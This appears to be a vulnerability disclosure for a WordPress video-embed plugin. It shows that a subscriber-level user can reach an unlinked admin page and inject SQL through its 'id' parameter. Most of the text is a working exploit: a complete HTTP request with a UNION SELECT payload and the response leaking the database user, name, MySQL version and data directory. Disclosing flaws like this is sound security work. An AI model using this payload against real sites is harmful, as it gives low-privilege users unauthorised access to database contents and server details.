The id GET parameter of one of the plugin’s page (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low privilege users, such as subscribers, to perform SQL injection.
Note: The URL /wp-admin/admin.php?page=edit-video-embed&id=1 is not directly in the menu but can be accessed by forced browsing.
GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user%28%29%2C3%2Cdatabase%28%29%2C%40%40version%2C6%2C@@datadir%3B HTTP/1.1
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [subscriber+]
Host: 172.28.128.50
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Apr 2021 00:25:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/
<...... snip ......>
<form action="" method="post" name="video_embed" style="float: left; width: 100%;" id="video_embed">
<table>
<tr>
<td>Title: </td>
<td><input type="text" name="title" value="bob@localhost" /></td>
</tr>
<tr style="height: 50px;">
<td>Video from: </td>
<td>
<input type="radio" name="video_embed_for" value="youtube" /> Youtube / Vimeo
<input type="radio" name="video_embed_for" value="videosuit" /> VideoSuit
</td>
</tr>
<tr>
<td>Youtube Embed Url: </td>
<td>
<input type="text" name="url" value="wp"/>
<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
</td>
</tr>
<tr>
<td>Pdf Path: </td>
<td><input type="text" name="pdf" value="8.0.23-0ubuntu0.20.04.1" /></td>
<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
</tr>
<tr>
<td>Audio Path: </td>
<td><input type="text" name="audio" value="6" /></td>
<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
</tr>
<tr>
<td>Useful Link: </td>
<td><textarea name="useful_link">/var/lib/mysql/</textarea></td>
<td><p style="font-size: 11px;">Please specify your html content</p></td>
</tr>
<tr>
<td><input type="submit" value="Save"/>
<td><input type="hidden" name="saved" value="1" /></td>
</tr>
</table>
</form>
</div>
<div class="clear"></div></div><!-- wpbody-content -->
<...... snip ......>